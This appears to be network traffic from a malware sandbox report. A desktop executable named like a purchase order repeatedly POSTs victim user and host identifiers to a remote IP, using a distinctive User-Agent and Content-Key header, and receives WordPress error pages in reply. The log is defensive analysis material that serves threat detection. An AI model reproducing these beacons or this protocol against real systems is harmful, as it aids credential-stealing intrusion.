6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED] Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
Aug 29, 2024 12:04:07.063405991 CEST	1236	IN	Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
Aug 29, 2024 12:04:07.063419104 CEST	366	IN	Data Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.8	49751	104.248.205.66	80	2940	C:\Users\user\Desktop\PO-0Y9005373R664.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:04:07.245456934 CEST	245	OUT	POST /index.php/17008709 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 104.248.205.66 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 470C3A50 Content-Length: 153 Connection: close
Aug 29, 2024 12:04:07.250483036 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
Aug 29, 2024 12:04:09.482350111 CEST	1236	IN	HTTP/1.0 500 Internal Server Error Date: Thu, 29 Aug 2024 10:04:07 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 2557 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED] Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
Aug 29, 2024 12:04:09.482382059 CEST	224	IN	Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
Aug 29, 2024 12:04:09.482393980 CEST	1236	IN	Data Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
Aug 29, 2024 12:04:09.482405901 CEST	142	IN	Data Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.8	49752	104.248.205.66	80	2940	C:\Users\user\Desktop\PO-0Y9005373R664.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:04:09.888953924 CEST	245	OUT	POST /index.php/17008709 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 104.248.205.66 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 470C3A50 Content-Length: 153 Connection: close
Aug 29, 2024 12:04:09.894994974 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
Aug 29, 2024 12:04:12.157613993 CEST	1236	IN	HTTP/1.0 500 Internal Server Error Date: Thu, 29 Aug 2024 10:04:10 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 2557 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED] Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
Aug 29, 2024 12:04:12.157633066 CEST	224	IN	Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
Aug 29, 2024 12:04:12.157644987 CEST	1236	IN	Data Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
Aug 29, 2024 12:04:12.157653093 CEST	142	IN	Data Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.8	49753	104.248.205.66	80	2940	C:\Users\user\Desktop\PO-0Y9005373R664.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:04:12.547591925 CEST	245	OUT	POST /index.php/17008709 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 104.248.205.66 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 470C3A50 Content-Length: 153 Connection: close
Aug 29, 2024 12:04:12.552431107 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
Aug 29, 2024 12:04:14.839831114 CEST	1236	IN	HTTP/1.0 500 Internal Server Error Date: Thu, 29 Aug 2024 10:04:13 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 2557 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED] Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
Aug 29, 2024 12:04:14.839951038 CEST	1236	IN	Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
Aug 29, 2024 12:04:14.840116024 CEST	366	IN	Data Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.8	49754	104.248.205.66	80	2940	C:\Users\user\Desktop\PO-0Y9005373R664.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:04:15.288630962 CEST	245	OUT	POST /index.php/17008709 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 104.248.205.66 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 470C3A50 Content-Length: 153 Connection: close
Aug 29, 2024 12:04:15.293513060 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
Aug 29, 2024 12:04:17.573535919 CEST	1236	IN	HTTP/1.0 500 Internal Server Error Date: Thu, 29 Aug 2024 10:04:15 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 2557 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED] Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
Aug 29, 2024 12:04:17.573556900 CEST	224	IN	Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
Aug 29, 2024 12:04:17.573570013 CEST	1236	IN	Data Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
Aug 29, 2024 12:04:17.573582888 CEST	142	IN	Data Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.8	49755	104.248.205.66	80	2940	C:\Users\user\Desktop\PO-0Y9005373R664.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:04:17.715063095 CEST	245	OUT	POST /index.php/17008709 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 104.248.205.66 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 470C3A50 Content-Length: 153 Connection: close
Aug 29, 2024 12:04:17.720150948 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
Aug 29, 2024 12:04:19.961350918 CEST	1236	IN	HTTP/1.0 500 Internal Server Error Date: Thu, 29 Aug 2024 10:04:18 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 2557 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED] Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
Aug 29, 2024 12:04:19.961375952 CEST	224	IN	Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
